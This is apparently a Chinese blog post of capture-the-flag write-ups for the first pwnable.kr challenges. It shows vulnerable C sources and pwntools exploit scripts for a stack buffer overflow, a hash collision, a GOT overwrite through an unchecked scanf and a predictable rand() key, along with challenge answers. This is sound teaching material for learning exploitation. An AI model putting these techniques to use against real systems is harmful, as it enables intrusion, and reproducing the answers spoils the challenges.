pwnable.kr 1-6...

最新推荐文章于 2022-09-12 16:09:12 发布
最新推荐文章于 2022-09-12 16:09:12 发布
阅读量185 收藏
点赞数
分类专栏: 二进制
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sopora/article/details/89322752
版权
1.fd
char buf[32];
int main(int argc, char* argv[], char* envp[]){
        if(argc<2){
                printf("pass argv[1] a number\n");
                return 0;
        }
        int fd = atoi( argv[1] ) - 0x1234;	//令fd==0即argv[1]==0x1234
        int len = 0;
        len = read(fd, buf, 32);
        if(!strcmp("LETMEWIN\n", buf)){
                printf("good job :)\n");
                system("/bin/cat flag");
                exit(0);
        }
        printf("learn about Linux file IO\n");
        return 0;
}

EXP

s = ssh('fd', 'pwnable.kr', 2222, 'guest') 
sh = s.process(['fd', '4660'])
sh.sendline('LETMEWIN')
print sh.recvall()
2. collision
unsigned long hashcode = 0x21DD09EC;
unsigned long check_password(const char* p){
        int* ip = (int*)p;
        int i;
        int res=0;
        for(i=0; i<5; i++){ //将输入的数分成五段,依次相加
                res += ip[i];
        }
        return res;
}
int main(int argc, char* argv[]){
        if(argc<2){
                printf("usage : %s [passcode]\n", argv[0]);
                return 0;
        }
        if(strlen(argv[1]) != 20){
                printf("passcode length should be 20 bytes\n");
                return 0;
        }

        if(hashcode == check_password( argv[1] )){
                system("/bin/cat flag");
                return 0;
        }
        else
                printf("wrong passcode.\n");
        return 0;
}

EXP

s = ssh('col', 'pwnable.kr', 2222, 'guest')
code = p32(0x1DD905E8)+'\x01'*16 //之所以用\x01是因为\x00不能作为命令行参数
log.info(s.process(['col', code]).recvall())
3.bof
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me! //此处存在栈溢出,可覆盖掉key
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

使用IDA查看栈结构

s= dword ptr -48h
----------------------------------------
lea     eax, [ebp-2Ch]	//overflowme为ebp-0x2C
mov     dword ptr [esp+48h+s], eax
call    gets
cmp     dword ptr [ebp+8], 0CAFEBABEh //key为ebp+0x8

EXP

s = remote('pwnable.kr', 9000)
code = 'a'*52+p32(0xcafebabe) //0x2C+0x8 = 52
s.sendline(code)
s.sendline('cat flag')
log.info(s.recv())
4.flag

查壳发现有UPX壳,脱壳

root@lilin:~/pwn# upx -d flag
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2017
UPX 3.94        Markus Oberhumer, Laszlo Molnar & John Reiser   May 12th 2017

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    883745 <-    380296   43.03%   linux/amd64   flag

Unpacked 1 file.

查看main函数,发现flag

   0x0000000000401184 <+32>:	mov    0x2c0ee5(%rip),%rdx        # 0x6c2070 <flag>
   -------------------
   (gdb) x/s 0x00496628
   0x496628:	"UPX...? sounds like a delivery service :)"
5.passcode
void login(){
        int passcode1;
        int passcode2;

        printf("enter passcode1 : ");
        scanf("%d", passcode1); //此处未加地址符号,故passcode1的值即为地址
        fflush(stdin);			//可以将passcode1理解为一个指针,如此便可以在数据段任意覆写
										//可以覆写以下任何一个函数的GOT表地址
        // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
        printf("enter passcode2 : ");  //在这里我们覆写printf的
        scanf("%d", passcode2);

        printf("checking...\n");
        if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");  //←覆写内容为此条语句的地址
        }
        else{
                printf("Login Failed!\n");
                exit(0);
        }
}

void welcome(){
        char name[100];
        printf("enter you name : ");
        scanf("%100s", name); //welcome在login之前调用,两个函数先后使用同一个栈基址的栈帧
        printf("Welcome %s!\n", name); //利用这里的scanf来操控passcode1的值
}

int main(){
        printf("Toddler's Secure Login System 1.0 beta.\n");

        welcome();
        login();

        // something after login...
        printf("Now I can safely trust you that you have credential :)\n");
        return 0;
}

payload = 'A' * 0x60      //填充字符,由&passcode1减去&name得到
payload += p32(0x0804a000)   //passcode1的值,这里用的是printf的GOT表的地址
s = ssh('passcode', 'pwnable.kr', 2222, 'guest')
io = s.process(['passcode'])
io.sendline(payload)
io.sendline(str(0x080485e3))	//将GOT表值覆写为call system指令的地址
print io.recvall()
6.random
int main(){
        unsigned int random;
        random = rand();        // random value!

        unsigned int key=0;
        scanf("%d", &key);

        if( (key ^ random) == 0xdeadbeef ){
                printf("Good!\n");
                system("/bin/cat flag");
                return 0;
        }

        printf("Wrong, maybe you should try 2^32 cases.\n");
        return 0;
}

计算机产生的随机数并不是真正的随机数,而是伪随机数,在C语言中,srand()被用来设置随机数种子,rand()则将种子经过一定的运算之后得到伪随机数,在种子相同的情况下,rand()的返回值也是相同的,在未设置种子的情况下会有一个默认的种子

int main(){
    unsigned int random;
    random = rand();
    printf("%u", random ^ 0xdeadbeef);
    return 0;
}
//----编译运行,得到结果3039230856-----
7.input
int main(int argc, char* argv[], char* envp[]){
        printf("Welcome to pwnable.kr\n");
        printf("Let's see if you know how to give input to program\n");
        printf("Just give me correct inputs then you will get the flag :)\n");

        // argv
        if(argc != 100) return 0;
        if(strcmp(argv['A'],"\x00")) return 0;
        if(strcmp(argv['B'],"\x20\x0a\x0d")) return 0;
        printf("Stage 1 clear!\n");

        // stdio
        char buf[4];
        read(0, buf, 4);
        if(memcmp(buf, "\x00\x0a\x00\xff", 4)) return 0;
        read(2, buf, 4);
        if(memcmp(buf, "\x00\x0a\x02\xff", 4)) return 0;
        printf("Stage 2 clear!\n");

        // env
        if(strcmp("\xca\xfe\xba\xbe", getenv("\xde\xad\xbe\xef"))) return 0;
        printf("Stage 3 clear!\n");

        // file
        FILE* fp = fopen("\x0a", "r");
        if(!fp) return 0;
        if( fread(buf, 4, 1, fp)!=1 ) return 0;
        if( memcmp(buf, "\x00\x00\x00\x00", 4) ) return 0;
        fclose(fp);
        printf("Stage 4 clear!\n");

        // network
        int sd, cd;
        struct sockaddr_in saddr, caddr;
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if(sd == -1){
                printf("socket error, tell admin\n");
                return 0;
        }
        saddr.sin_family = AF_INET;
        saddr.sin_addr.s_addr = INADDR_ANY;
        saddr.sin_port = htons( atoi(argv['C']) );
        if(bind(sd, (struct sockaddr*)&saddr, sizeof(saddr)) < 0){
                printf("bind error, use another port\n");
                return 1;
        }
        listen(sd, 1);
        int c = sizeof(struct sockaddr_in);
        cd = accept(sd, (struct sockaddr *)&caddr, (socklen_t*)&c);
        if(cd < 0){
                printf("accept error, tell admin\n");
                return 0;
        }
        if( recv(cd, buf, 4, 0) != 4 ) return 0;
        if(memcmp(buf, "\xde\xad\xbe\xef", 4)) return 0;
        printf("Stage 5 clear!\n");

        // here's your flag
        system("/bin/cat flag");
        return 0;
}
forestdwelling
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
802.3bj-2014.pdf
09-08
IEEE802.3bj以及IEEE802.3bm定义了第二代100G。第二代100G和第一代100G的显著区别就是单路电接口速率达到了25.78125Gbps
IEEE Std 802.3ba-2010 (Amendment to IEEE Standard 802.3-2008)
11-28
来自IEEE Xplore官网,IEEE Std 802.3ba-2010 (Amendment to IEEE Standard 802.3-2008),开发100GBASE-ER4、100GBASE-LR4、100GBASE-SR10、40GBASE-KR4、40GBASE-SR4、40GBASE-LR4等产品必备
pwnable.kr-cmd2 WP
Casuall的博客
06-04 231
这道题的ssh密码是上一道题的flag,“mommy now I get what PATH environment is for
pwnable.kr-random
Casuall的博客
03-21 351
pwnable.kr-random 这个是(https://pwnable.kr)中第6个题,比较简单。ssh连接后,直接运行里面可执行文件random,随便输入几个数,提示你应该尝试2的32次幂,直接看源码吧。 int main(){ unsigned int random; random = rand(); // random value! ...
pwnable.kr-bof WP
Casuall的博客
03-24 5350
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
pwnable.kr - brain fuck
加号减减号的博客
03-06 811
题目简介 分析 writeup 题目简介 Brain fuck 是 pwnable.kr 第二阶段的第一道题,考察了覆些 GOT 表等知识点。题目信息如下: 分析 将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。 main 函数如下: int __cdecl main...
pwnable.kr coin1 WP
Casuall的博客
05-12 334
首先看一下题目 题目的意思是让你玩一个游戏,给你一些金币,其中有一个假币,这个假币外表和真的金币一样,但是重量不同,真的金币重量为10,假币重量为9。你需要帮他找到100枚假币才能过关。 游戏规矩如下: 给你N枚硬币和C次机会 选择硬币的序号,称重 你获得硬币的重量 第二步和第三步重复C次,然后你给出正确答案(也就是哪一枚是假币) 下面给出了一个列子,比如给你4枚硬币,2次机会,你第一次选择...
pwnable.kr-leg WP
Casuall的博客
04-24 347
首先看一下源码 #include <stdio.h> #include <fcntl.h> int key1(){ asm("mov r3, pc\n"); } int key2(){ asm( "push {r6}\n" "add r6, pc, $1\n" "bx r6\n" ".code 16\n" "mov r3, pc\n" "add r3, ...
pwnable.kr-shellshock WP
Casuall的博客
05-08 307
这道题涉及的知识点是shellshock(也叫破壳漏洞)CVE-2014-6271,GNU Bash 版本小于等于4.3可能存在这个漏洞。首先查看一下有什么文件 发现目录里有一个可执行文件bash,我们来查看一下bash的版本 可以看到这个路径中的bash版本低于4.3,下面来测试一下这两个版本的bash是否存在破壳漏洞 env x='() { :;}; echo shellshocked' ...
pwnable.kr - md5 calculator
加号减减号的博客
03-07 1798
题目简介 分析 wirteup 参考资料 题目简介 题目给出的信息如下: 可知该题实现了一个 MD5 计算器,并且给出了一个提示,提示稍后再说。做这道题我学到了一个新的技能,就是 python 里面的 os.popen() 的用法,觉得十分有用,希望对大家也有帮助。 分析 下载得到文件,IDA 分析得到 main 函数如下: 这里可以得知几个关键的信息,...
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 841
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
pwnable.kr - simple login
加号减减号的博客
03-08 575
题目信息 分析 解题思路 wirteup 题目信息 题目给出的信息如下: 分析 下载得到 login 文件,这是一个静态链接的可执行文件。拖进 IDA 分析,main 函数如下: int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE *v4; // [esp+18h] [...
Reversing.kr--crackme200.rar
09-30
Reversing.kr--crackme200.rar
apachecn#apachecn-ctf-wiki#PWN-dragon-echo1-echo2-[pwnable.kr]CT
07-25
1. malloc person 2. malloc dragon 3. free dragon
IEEE Std 802.3cd-2018
11-28
来自IEEE Xplore官网,IEEE Std 802.3cd-2018 (Amendment to IEEE Std 802.3-2018 as amended by IEEE Std 802.3cb-2018 and IEEE Std 802.3bt-2018),开发50GBASE-FR、50...SR2、200GBASE-SR4、200GBASE-KR4等产品必备
基于springboot+vue+MySQL实现的在线考试系统+源代码+文档
06-01
web期末作业设计网页 基于springboot+vue+MySQL实现的在线考试系统+源代码+文档
318_面向物联网机器视觉的目标跟踪方法设计与实现的详细信息-源码.zip
06-02
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。
FPGA Verilog 计算信号频率,基础时钟100Mhz,通过锁相环ip核生成200Mhz检测时钟,误差在10ns
06-02
结合等精度测量原理和原理示意图可得:被测时钟信号的时钟频率fx的相对误差与被测时钟信号无关;增大“软件闸门”的有效范围或者提高“标准时钟信号”的时钟频率fs,可以减小误差,提高测量精度。 实际闸门下被测时钟信号周期数为X,设被测信号时钟周期为Tfx,它的时钟频率fx = 1/Tfx,由此可得等式:X * Tfx = X / fx = Tx(实际闸门)。 其次,将两等式结合得到只包含各自时钟周期计数和时钟频率的等式:X / fx = Y / fs = Tx(实际闸门),等式变换,得到被测时钟信号时钟频率计算公式:fx = X * fs / Y。 最后,将已知量标准时钟信号时钟频率fs和测量量X、Y带入计算公式,得到被测时钟信号时钟频率fx。
校园二手商品交易系统三.wmv
最新发布
06-02
校园二手商品交易系统三.wmv
KR468G-TDS.docx
01-06
KR468G is a bearing quenching oil developed by KERUN Company. It is designed to address the challenges of heat treatment deformation and surface brightness in bearing production. The oil has a ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值